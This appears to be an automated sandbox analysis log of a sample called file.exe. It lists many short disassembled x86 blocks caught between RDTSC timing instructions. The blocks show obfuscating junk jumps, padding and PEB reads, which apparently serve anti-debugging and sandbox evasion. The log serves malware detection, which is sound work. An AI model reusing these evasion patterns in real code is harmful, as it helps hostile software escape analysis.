Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990801 second address: 4990807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990807 second address: 499080B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0004A second address: 4A0004E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0004E second address: 4A00052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00052 second address: 4A00058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00058 second address: 4A0006B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0006B second address: 4A0006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0006F second address: 4A00097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F6E64DC24C5h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00097 second address: 4A0009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0009B second address: 4A000A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000A1 second address: 4A000B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F7531h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A000B6 second address: 4A00137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000030h] 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 mov cx, dx 0x00000018 popad 0x00000019 sub esp, 18h 0x0000001c pushad 0x0000001d jmp 00007F6E64DC24C1h 0x00000022 movzx ecx, di 0x00000025 popad 0x00000026 push ecx 0x00000027 pushad 0x00000028 movzx ecx, dx 0x0000002b jmp 00007F6E64DC24BBh 0x00000030 popad 0x00000031 mov dword ptr [esp], ebx 0x00000034 jmp 00007F6E64DC24C6h 0x00000039 mov ebx, dword ptr [eax+10h] 0x0000003c jmp 00007F6E64DC24C0h 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00137 second address: 4A00159 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F6E644F7532h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00159 second address: 4A001B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [772406ECh] 0x0000000f pushad 0x00000010 jmp 00007F6E64DC24BCh 0x00000015 pushfd 0x00000016 jmp 00007F6E64DC24C2h 0x0000001b sbb ecx, 4C7F5E48h 0x00000021 jmp 00007F6E64DC24BBh 0x00000026 popfd 0x00000027 popad 0x00000028 test esi, esi 0x0000002a pushad 0x0000002b mov edi, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f movzx ecx, di 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001B5 second address: 4A001E9 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6E644F7533h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jne 00007F6E644F82BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6E644F7531h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001E9 second address: 4A001FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A001FE second address: 4A00204 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00204 second address: 4A00208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00208 second address: 4A0020C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0020C second address: 4A00222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6E64DC24BBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00222 second address: 4A00281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6E644F7533h 0x00000014 pushfd 0x00000015 jmp 00007F6E644F7538h 0x0000001a xor ah, 00000058h 0x0000001d jmp 00007F6E644F752Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00281 second address: 4A002CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2113107Ah 0x00000008 call 00007F6E64DC24BBh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 call dword ptr [77210B60h] 0x00000017 mov eax, 766BE5E0h 0x0000001c ret 0x0000001d pushad 0x0000001e jmp 00007F6E64DC24C0h 0x00000023 popad 0x00000024 push 00000044h 0x00000026 pushad 0x00000027 mov dx, ax 0x0000002a movzx eax, bx 0x0000002d popad 0x0000002e pop edi 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F6E64DC24C0h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A002CD second address: 4A00395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F752Ch 0x00000009 or esi, 0BBAFC78h 0x0000000f jmp 00007F6E644F752Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, edi 0x00000019 jmp 00007F6E644F7536h 0x0000001e push eax 0x0000001f jmp 00007F6E644F752Bh 0x00000024 xchg eax, edi 0x00000025 jmp 00007F6E644F7536h 0x0000002a push dword ptr [eax] 0x0000002c pushad 0x0000002d mov al, 01h 0x0000002f pushfd 0x00000030 jmp 00007F6E644F7533h 0x00000035 sbb si, 26FEh 0x0000003a jmp 00007F6E644F7539h 0x0000003f popfd 0x00000040 popad 0x00000041 mov eax, dword ptr fs:[00000030h] 0x00000047 jmp 00007F6E644F752Eh 0x0000004c push dword ptr [eax+18h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F6E644F7537h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0042C second address: 4A0043B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0043B second address: 4A004A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007F6E644F752Fh 0x00000014 sub ecx, 4E8111FEh 0x0000001a jmp 00007F6E644F7539h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 mov dword ptr [esi+0Ch], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F6E644F7533h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004A8 second address: 4A004AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A004AC second address: 4A00571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebx+4Ch] 0x0000000a jmp 00007F6E644F752Bh 0x0000000f mov dword ptr [esi+10h], eax 0x00000012 jmp 00007F6E644F7536h 0x00000017 mov eax, dword ptr [ebx+50h] 0x0000001a jmp 00007F6E644F7530h 0x0000001f mov dword ptr [esi+14h], eax 0x00000022 jmp 00007F6E644F7530h 0x00000027 mov eax, dword ptr [ebx+54h] 0x0000002a jmp 00007F6E644F7530h 0x0000002f mov dword ptr [esi+18h], eax 0x00000032 pushad 0x00000033 push eax 0x00000034 pushfd 0x00000035 jmp 00007F6E644F752Dh 0x0000003a or si, 3306h 0x0000003f jmp 00007F6E644F7531h 0x00000044 popfd 0x00000045 pop eax 0x00000046 mov eax, ebx 0x00000048 popad 0x00000049 mov eax, dword ptr [ebx+58h] 0x0000004c jmp 00007F6E644F7533h 0x00000051 mov dword ptr [esi+1Ch], eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F6E644F7535h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00571 second address: 4A005D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c jmp 00007F6E64DC24BEh 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 jmp 00007F6E64DC24C0h 0x00000019 mov eax, dword ptr [ebx+60h] 0x0000001c jmp 00007F6E64DC24C0h 0x00000021 mov dword ptr [esi+24h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6E64DC24C7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A005D9 second address: 4A005DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A005DF second address: 4A005E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A005E3 second address: 4A00623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c call 00007F6E644F752Dh 0x00000011 mov eax, 4CB7C417h 0x00000016 pop ecx 0x00000017 push ebx 0x00000018 mov ch, 1Fh 0x0000001a pop edi 0x0000001b popad 0x0000001c mov dword ptr [esi+28h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6E644F7537h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00623 second address: 4A0062C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, E4DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007E9 second address: 4A007EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A007EF second address: 4A00844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 mov ecx, edx 0x00000014 popad 0x00000015 push 00000001h 0x00000017 pushad 0x00000018 movsx edx, ax 0x0000001b mov esi, 1CDEF3BDh 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007F6E64DC24C8h 0x00000027 push eax 0x00000028 pushad 0x00000029 popad 0x0000002a nop 0x0000002b pushad 0x0000002c pushad 0x0000002d mov dl, D1h 0x0000002f mov ax, 5F0Dh 0x00000033 popad 0x00000034 mov ax, DF09h 0x00000038 popad 0x00000039 lea eax, dword ptr [ebp-10h] 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00844 second address: 4A00848 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00848 second address: 4A00859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00859 second address: 4A0088F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F6E644F752Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6E644F752Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0088F second address: 4A00895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00895 second address: 4A0089B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008E6 second address: 4A008EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008EA second address: 4A008EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008EE second address: 4A008F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A008F4 second address: 4A00955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7532h 0x00000009 adc eax, 1C368508h 0x0000000f jmp 00007F6E644F752Bh 0x00000014 popfd 0x00000015 mov di, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test edi, edi 0x0000001d jmp 00007F6E644F7532h 0x00000022 js 00007F6ED6CB62B3h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6E644F7537h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00955 second address: 4A0099D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov di, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp-0Ch] 0x0000000f pushad 0x00000010 movzx esi, dx 0x00000013 jmp 00007F6E64DC24C5h 0x00000018 popad 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6E64DC24C8h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A0099D second address: 4A009A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A009A3 second address: 4A009BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 63A3h 0x00000007 mov ecx, 51A096FFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebx+78h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A009BB second address: 4A009BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A009BF second address: 4A009D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A009D6 second address: 4A00A28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007F6E644F7530h 0x0000000c sub ecx, 2270A348h 0x00000012 jmp 00007F6E644F752Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push 00000001h 0x0000001d jmp 00007F6E644F7536h 0x00000022 nop 0x00000023 pushad 0x00000024 mov dl, ch 0x00000026 mov dh, 8Eh 0x00000028 popad 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00A28 second address: 4A00A36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00A36 second address: 4A00B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7531h 0x00000009 or ax, E876h 0x0000000e jmp 00007F6E644F7531h 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 nop 0x0000001a pushad 0x0000001b movzx ecx, dx 0x0000001e pushfd 0x0000001f jmp 00007F6E644F7535h 0x00000024 sbb esi, 27776486h 0x0000002a jmp 00007F6E644F7531h 0x0000002f popfd 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp-08h] 0x00000034 jmp 00007F6E644F752Eh 0x00000039 nop 0x0000003a pushad 0x0000003b jmp 00007F6E644F752Eh 0x00000040 pushfd 0x00000041 jmp 00007F6E644F7532h 0x00000046 sub si, 8188h 0x0000004b jmp 00007F6E644F752Bh 0x00000050 popfd 0x00000051 popad 0x00000052 push eax 0x00000053 jmp 00007F6E644F7539h 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F6E644F752Dh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00B0B second address: 4A00B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00B61 second address: 4A00BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F6ED6CB6061h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6E644F7533h 0x00000018 sbb al, FFFFFFFEh 0x0000001b jmp 00007F6E644F7539h 0x00000020 popfd 0x00000021 mov esi, 26B48047h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00BBE second address: 4A00C96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F6E64DC24BFh 0x0000000b sbb esi, 6725660Eh 0x00000011 jmp 00007F6E64DC24C9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebp-04h] 0x0000001d jmp 00007F6E64DC24BEh 0x00000022 mov dword ptr [esi+08h], eax 0x00000025 pushad 0x00000026 call 00007F6E64DC24BEh 0x0000002b pushfd 0x0000002c jmp 00007F6E64DC24C2h 0x00000031 adc esi, 466E36E8h 0x00000037 jmp 00007F6E64DC24BBh 0x0000003c popfd 0x0000003d pop ecx 0x0000003e pushfd 0x0000003f jmp 00007F6E64DC24C9h 0x00000044 jmp 00007F6E64DC24BBh 0x00000049 popfd 0x0000004a popad 0x0000004b lea eax, dword ptr [ebx+70h] 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F6E64DC24C4h 0x00000055 add eax, 04290BA8h 0x0000005b jmp 00007F6E64DC24BBh 0x00000060 popfd 0x00000061 pushad 0x00000062 pushad 0x00000063 popad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00C96 second address: 4A00CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push 00000001h 0x00000008 jmp 00007F6E644F7530h 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F6E644F752Dh 0x00000016 call 00007F6E644F7530h 0x0000001b pop esi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00CD1 second address: 4A00D28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov di, B144h 0x0000000f pushfd 0x00000010 jmp 00007F6E64DC24BDh 0x00000015 xor eax, 1A117A86h 0x0000001b jmp 00007F6E64DC24C1h 0x00000020 popfd 0x00000021 popad 0x00000022 nop 0x00000023 jmp 00007F6E64DC24BEh 0x00000028 lea eax, dword ptr [ebp-18h] 0x0000002b pushad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00D28 second address: 4A00D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6E644F752Ah 0x0000000a jmp 00007F6E644F7535h 0x0000000f popfd 0x00000010 popad 0x00000011 push ecx 0x00000012 push ebx 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007F6E644F7536h 0x0000001c push eax 0x0000001d jmp 00007F6E644F752Bh 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6E644F7535h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E44 second address: 4A00E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E48 second address: 4A00E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E4C second address: 4A00E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E52 second address: 4A00E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E58 second address: 4A00E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E5C second address: 4A00E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00E60 second address: 4A00EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6E64DC24C8h 0x00000012 sbb al, FFFFFF88h 0x00000015 jmp 00007F6E64DC24BBh 0x0000001a popfd 0x0000001b pushad 0x0000001c jmp 00007F6E64DC24C6h 0x00000021 mov si, EF01h 0x00000025 popad 0x00000026 popad 0x00000027 mov edx, 772406ECh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00EBC second address: 4A00EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00EC2 second address: 4A00EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00EC8 second address: 4A00ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00ECC second address: 4A00F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub eax, eax 0x0000000a jmp 00007F6E64DC24BFh 0x0000000f lock cmpxchg dword ptr [edx], ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 mov bx, ax 0x00000018 mov cx, C58Dh 0x0000001c popad 0x0000001d mov esi, 7A842D89h 0x00000022 popad 0x00000023 pop edi 0x00000024 jmp 00007F6E64DC24C4h 0x00000029 test eax, eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov esi, edi 0x00000030 jmp 00007F6E64DC24C9h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A00F2F second address: 4A00F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F752Ch 0x00000009 rdtsc
